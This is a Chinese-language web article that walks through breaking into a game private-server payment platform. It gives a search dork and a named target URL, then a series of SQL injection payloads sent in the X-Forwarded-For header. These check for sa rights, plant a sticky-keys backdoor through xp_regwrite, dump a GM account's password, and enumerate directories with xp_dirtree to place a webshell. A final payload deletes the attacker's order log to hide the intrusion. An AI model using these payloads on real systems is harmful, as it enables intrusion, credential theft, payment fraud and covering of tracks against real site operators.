• 网站首页
  • 传奇技术
  • 传世技术
  • 奇迹技术
  • 魔兽技术
  • 魔域技术
  • 江湖技术
  • 其他技术
  • 传三技术
  • 完美技术
  • 诛仙技术
  • 游戏程序

    • 软件文章

    您当前的位置:首页 > 其他技术 > 传奇漏洞

    入侵传奇私服支付平台的方法

    本文出处:网游动力作者:本站发布时间:2012-01-30阅读次数:

    今天给大家带来的是入侵传奇私服支付平台。
    google 搜索关键字

    由于时间关系 我先找了一个站。

    inurl:buy/fq.asp?gid=cq

    算了这个站没开3389 也难得搞下去。站我已经找好了 。。
    就这个 http://www.pay39.net/buy/fq.asp?gid=cq&uid=514
    下单抓包 改包 我们先测试下是不是sa 权限。免得浪费时间。
    inurl:buy/fq.asp?gid=cq


    检测权限
    X-Forwarded-For: 11','1','1','1','1',cast(system_user as int));--
    [Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'sa' 转换为数据类型为 int 的列时发生语法错误。 呵呵 不错。 开了3389 我们替换他的shift
    X-Forwarded-For: 11','1','1','1','1','1');exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe','debugger','REG_sz','c:windowssystem32cmd.exe on';--
    返回无错。。执行成功。接下来 想干啥就干啥 加账户 进服务器。。或者查找平台上的gm 账户密码 给自己游戏里发元宝。。。。。
    我下面也准备好了 如果不是sa 的情况下 怎么继续入侵 拿webshell.

    爆出平台指定id的账户密码(显示在指定订单的充值卡号上)
    X-Forwarded-For: 11','1','1','1','1','1');update mobile1 set usercode=(select username+'|'+passwd from member where id=543) where num='2012011203422546319'--
    // num为自己下单的订单号,此处id为游戏平台gm账户id,

    第一步:建立表
    X-Forwarded-For: 11','1','1','1','1','1');drop table foofoofoo;create table foofoofoo([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);--
    第二步
    X-Forwarded-For: 11','1','1','1','1','1');declare @z nvarchar(4000) set @z=0x65003A005C00 insert foofoofoo execute master..xp_dirtree @z,1,1--
    //注意:0x63003a005c00 = C: 为sql ENCODE
    d: 0x64003A005C00
    第三步 暴出总数
    X-Forwarded-For: 11','1','1','1','1','1');update mobile1 set usercode=(select cast(count(*) as varchar(8000))+char(94) from foofoofoo) where num='2012011203422546319'--
    第四步:暴出你想要的文件夹名字和文件名字
    X-Forwarded-For: 11','1','1','1','1','1');update mobile1 set usercode=(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top 1 * from foofoofoo order by isfile,name) t order by isfile desc,name desc) where num='2012011203422546319'--

    修改distinct后面的数字,依次爆出。

    一直爆 找到站点目录 然后备份木马到站点目录 就可以拿到webshell 时间关系我就不演示了。
    谢谢观赏。。

    by ko高祖

    附带删除 下单日志
    X-Forwarded-For: 11','1','1','1','1','1');delete from mobile1 where number='自己下单时候的账户'--
     

    热门文章
    热门标签
    传奇引擎版本网络开区最新服务脚本服务端1.76英雄科技商业职业地图HERO元素1.80合击中变极品方法连击1.85完美轻变数据教程一条龙传世登陆全新完整免费仿盛大登陆器技能传说经典系统特色攻略更新配置网站玩家激情升级GOM火爆玩法
    Copyright © 2008-2016 网游动力. All Rights Reserved.
    Powered by:SF5.Net
    辽ICP备17007188号
    关于本站 | 网站帮助 | 广告合作 | 发布软件 | 下载声明 | 网站地图